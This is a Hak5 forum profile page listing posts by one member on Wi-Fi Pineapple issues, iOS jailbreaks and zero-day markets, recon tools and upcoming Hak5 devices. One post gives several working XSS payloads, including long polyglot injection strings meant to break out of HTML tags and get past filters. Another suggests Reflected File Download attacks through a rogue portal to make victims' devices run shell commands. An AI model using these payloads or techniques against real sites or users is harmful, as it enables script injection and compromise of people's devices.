Jump to content

zoro25

Active Members
  • Content Count

    81
  • Joined

  • Last visited

  • Days Won

    2

Posts posted by zoro25

  1. I've done some searches on the forums and this has been asked many times however there has never been a definitive answer on the support for the Alfa AWUS036ACH 

    This is one of the most popular adapters for Kali and while I know the PineApples are not Kali Os they do run linux flavors for which the Alfa AWUS036ACH  has driver support. 

    Has anyone managed to get the Alfa AWUS036ACH to show up on the PineApple and if yes then please post steps and if not then are any of the Hak5 team able to give a reason for the lack of support given how popular this adapter is.

  2. Yes it seems that there is a bug on the latest firmware where tools are not being installed, 

    I'll attempt the same recovery method to get this working. 

    In my case I had responder installed but I removed it and after no tools will install :-(

     

  3. 8 hours ago, RazerBlade said:

    Link?

    http://newosxbook.com/liberios/ - and Link to Morpheus who did the hack https://twitter.com/Morpheus______

    This was released 2 days ago and works with all IOS 11 devices, However Cydia hasn't been updated to work with IOS 11 so any tweaks or sideloading of apps may not work just yet, but with this you can easily get SSH access into the device and play with binaries and command utilities you may want. 

    I suggest using a spare device for any type of ARM/IOS hacking. 

    Also expect this to be patched very soon.

  4. As a person who worked on one of the most popular IOS and Android apps (tens of millions of users on both platforms)

    I can confirm that both Google and Apple check updates especially if any update requires extra user permissions If no extra permissions are requested then once approved (and it will certainly be checked before being allowed in their app stores) they will just do random checks on the app.  Any IOS/Android exploits are too valuable to be out in the wild, the going rate for an IOS current version hack is $1,000,000 and there was one shown just a few weeks ago (it won't be released) see https://keen-lab.com/jailbreak/11.1/ for current IOS firmware hack that will be sold to highest bidder. 

    Team Keen has said that they will release the hack but my guess is that it's already been sold and will be released publically at the same time as a new IOS upgrade release. This happens a lot and either exploit vendors/ antivirus companies and software company consortiums who get together and purchase a lot of the zero days in an effort to help better protect their users and the original researcher will release the zero-day on the day of the patch release (the same thing happened with the Krack exploit)

  5.  It's been shown that the same Israeli company (Cellebrite I think their name is) that helped the FBI to bypass the IOS security on the San Bernadino shooters phone can also bypass later firmware as well. 

    Also, their CEO claims they can also bypass the current firmware (however have stated that they won't give any details or show that hack working as it's only for their 3 letter agency type customers).

    My guess is that there are a large number of zero days for IOS which are floating around but only released to top paying bidders.

    • Like 3
  6. Just saw that you already mention Builtwith, That's who I use to profile things like this. 

    https://builtwith.com/hak5.com

    They also have a browser plugin, It's very easy to use their API or just scrape for an app you would write yourself. 

    I also use TCPIPUtils for looking up networking info, (subdomains etc)

    https://www.tcpiputils.com/browse/domain/hak5.com

    I then also do a few other things, but builtwith and TCPIPUtlis  are my main 2

  7. Also, I would suggest looking in the console of your browser for errors when injecting. 

    As already mentioned without knowing the app or js/html of page it's hard to give a working payload

    However, you can try either 

    -->'";</ScriPT><sCriPt><confirm()</scRiPt> 

    Which may better break out of the HTML and is nice and short (similar to what you tried but I included single and double quotes and also the end of a comment just in case you end up in a comment section. 

    Or you can try a polyglot injection payload, (these will usually set off a WebApp Firewall but feel free to try)

    javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">onerror=confirm().source<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>" 

    Or 

    jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--

    which are both attempting to do the same thing. 

    Good luck . 

     

    *****

    EDIT

    While it's not my intention to pop alerts on the hak5 forum, you can see that one of the polyglots is working as planned and is breaking out of tags to show a broken image,

    This is the equivalent of <img src="x" />

    From here you would just need to tweak the code to pop an alert on a broken image, remember to read the console and attempt to bypassing protections.

    onerror=confirm() or something similar for a basic pop on a broken image.

    ****

     

  8. While I've not done this on the pineapple,  only on websites I've tested. 

    My advice would be to take a look at RFD attacks (Reflected File Download attacks). 

     

    It should be possible to set up a vulnerable page/site using EvilPortal or something similar on the pineapple and then your link should auto-download and run shell commands on the users device. (works on both win and nix but I've only tested against windows users)

    I'm not going to walk you through the whole attack but it's easy to do and requires little to no input from a user (it's also possible to bypass all browser security warnings also)

    Here is a very good walkthrough by Oren Hafif who now works for FaceBook security I think. 

    FACEBOOK RFD ATTACKS

    Good luck.

    PS this would make an awesome module (hint hint @Foxtrot and would give easy total pwnage to the pineapple devices) 

  9. Sorry to be a bit of a dick, but can you clarify "short order", Are we talking days, weeks, months? 

    I understand that new bugs pop up that needs to be fixed as newer features are added but I'm guessing there is some internal date that could be given (feel free to pad the date with extra time to fix the unknown - unknowns)

  10. I think you guys are missing the R&D costs, 

    If you look at Seytonic he pushes (or sells) Malduino but the Malduino uses DuckyScript as it's language. 

    Who invented DuckyScript . Hak5 , 

    OKay so it's not massively hard to come up with a new simple scripting language or even using the Malduino for USB automation, but no one else did it in a small easy to use package. 

    That's what Hak5 brings, ease of use and some resemblance of support (I say resemblance as most of the support is from the community so it's hit or miss) . Sure you can do a lot of the pineapple stuff via a Linux OS with your network cards in Promiscuous mode but the Pineapples just give you a nice small package which to carry out your engagement. 

    Seytonic is great and his guides are awesome for those with less cash, but lots of Hak5 customers are businesses/Govt agencies or just people with a passion for security who don't mind paying a little extra for the community. 

    Hak5 if anything has been a bit of victim of its success and its customer base grew massively over the last few years (pineapple5 onwards) and it seems only now the dev team is beginning to catch up to cope with that larger customer expectation. Bringing Seb was a good start back at the start of Pineapple5, but he and Darren have always been swamped. For example almost 2 weeks after the source for Kracked was leaked (openly available) which is the biggest thing to happen to WIFI in about 10 years , The pineapples still haven't got modules/new firmware (in fact while I'm on it the firmware is over a year old)

    Lets hope with the larger Dev team things get better.

  11. I didn't read it as a worm but to attack machines attached to a switch, (let's say 8 devices) As previously mentioned it's going to be hard as it sounds like he's looking for persistence. 

    Those 8 machines could be any OS/IOT devices so yes you can MITM them to grab credentials etc, but getting persistent access is going to be hard as this usually means exploiting some kind of bug in the underlying OS or software running on the device.  (see the earlier reply from PoSHMagiC0de)

    I think you should instead be looking at how to exploit 1 device on the switch with high certainty using the squirrel and then you need to know/learn how to pivot from there to gain further access to other devices. This is how most engagements work. People never really start with owning the network, but find a weak point (phishing etc) and pivot from there.

  12. Does anyone know anything about that "Friday thing" mentioned in today's Hak5 video? or what I'm guessing is a new PineApple firmware release or at least a new Krack module

    ****EDIT****  (after watching it back it seems that the Friday thing may have been last weeks Packet Squirrel announcement, I watched the recorded streams but didn't see anything new pineapple or Krack related)

     

  13. See my post here about other possible items, 

    While nothing is confirmed by the team, these are registered by Darren. However, it should be noted that only the PacketSquirrel.com domain has any content. The others all give errors. 

    Also even if those were the names of new tools, a name still gives us nothing about how the tool carries out its attack or what it can do to aid pivoting. Except maybe the way it connects

    for example

    USBLadyBug = USB device attack meaning physical access to device under test will be needed

     ScreenCrab = No idea on attack style but it seems like it could be a remote screen grabbing tool (I've no idea how this could work if it was that)

    USBBoomStick  = again USB in name so suppose another tool needing physical access

    Only about 2 days to go 

  14. Darren confirmed that 3 devices are going to be released on Friday. - Packet Squirrel just seems to be one of them (unless there are 2 versions of the squirrel - like the Nano and Tetra are 2 versions of the same tool). 

    Anyway looking forward. 

    Still no pre-order, Seems I'm going to have to be okay with ordering on the unveiling, just hope the team can ship quickly.  (otherwise, I can always play when I get back from my trip)

     

     

  15. Any chance of setting up preorders (yes I know we don't know what it is yet, but I would still purchase from my previous good experience with Hak5 stuff), Gotta say only a couple of companies I know of have such a loyal following that people will buy their stuff without even knowing fully what it is. (Hak5 and Tesla are the  only 2 that comes to mind).

    I ask about pre-order as I'm leaving the country for a few weeks around the start of November and would love to play with new toys on my break. 

    Not sure if it would get here in time if I were to order on release date. 

    Also while this looks nothing like the picture I would love something like this 

    https://www.aliexpress.com/item/1m-GPS-Positioning-Pick-up-Line-Tracker-Remote-Tracking-Cable-GIM-Answer-Monitor-USB-Charging-Data/32813314360.html?trace=msiteDetail2pcDetail

    or a better one on Amazon handles both IOS and Android devices = https://www.amazon.com/Tracker-Vehicles-Charger-Tracking-Device/dp/B0719692ST/

    But have it instead take over the network of whatever device it's plugged into. 

    So it looks like a normal USB cable but has LTE or 3G and can assume default network device. 

    Would obviously work on PC/Mac/Android and IOS as main candidates. (just dropping ideas :-) 

    Only thing not sure about if it needs a network controller chip at both ends in case it's plugged from PC to Phone (log + take over both networks and have full End-2-End device control), 

    Anyway I await the 20th and the new devices (Plural - WhoooHooo)

    • Like 1
  16. 19 minutes ago, Dave-ee Jones said:

    Pretty sure someone has attempted to join the forces of the PineAP and the BB, just didn't see what they came up with. I'm sure if you did a search on the forums you might be able to find out.

    1

    Yeah, Seb mentioned that he was going to release something at one point  https://forums.hak5.org/topic/40215-pineapple-core/ and also see

    However, from the discussion, it does seem that the Bunny does take the place of the often mentioned PineApple Core. (meaning that the Squirrel most likely isn't that either).where Seb mentioned an "officail solution soon"

    So there goes my 2 guesses. :-)

    Not long now, let's hope they get the location confirmed and then we'll have a hard and fast date to look forward to. 

     

     

     

     

×
×
  • Create New...